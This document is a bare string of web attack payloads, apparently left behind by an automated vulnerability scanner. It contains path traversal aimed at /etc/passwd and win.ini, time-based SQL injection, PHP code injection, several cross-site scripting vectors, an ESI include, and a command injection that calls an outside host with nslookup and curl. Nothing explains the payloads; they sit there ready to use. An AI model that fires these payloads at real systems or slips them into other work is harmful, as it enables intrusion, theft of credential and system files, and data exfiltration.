../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg -1); waitfor delay '0:0:15' -- ';print(md5(31337));$a=' xfs.bxss.me 1%22onmouseover=g2PO(90642)%22 1<iframe src='data:text/html;base64 1<anx60xO x=9847> ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg /\../\../\../\../\../\../\../etc/passwd &n925787=v944465 if(now()=sysdate() bxss.me 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99) 1'"()&%<zzz><ScRiPt >g2PO(9923)</ScRiPt> 1"onmouseover=g2PO(92412)" PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9296'> 1<img sRc='http://attacker-9380/log.php? /../..//../..//../..//../..//../..//etc/passwd%00.jpg <esi:include src="http://bxss.me/rpb.png"/> WEB-INF/web.xml sleep(15) 1 waitfor delay '0:0:15' -- 15) '"()&%<zzz><ScRiPt >g2PO(9523)</ScRiPt> 1" zSro=g2PO([!+!]) 1Hk=" 1<body onload=g2PO(9982)> 1<ablxfRB< .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd &(nslookup -q=cname hitaiulkwpbvx1f47b.bxss.me||curl hitaiulkwpbvx1f47b.bxss.me)&'\"`0&(nslookup -q=cname hitaiulkwpbvx1f47b.bxss.me||curl hitaiulkwpbvx1f47b.bxss.me)&`'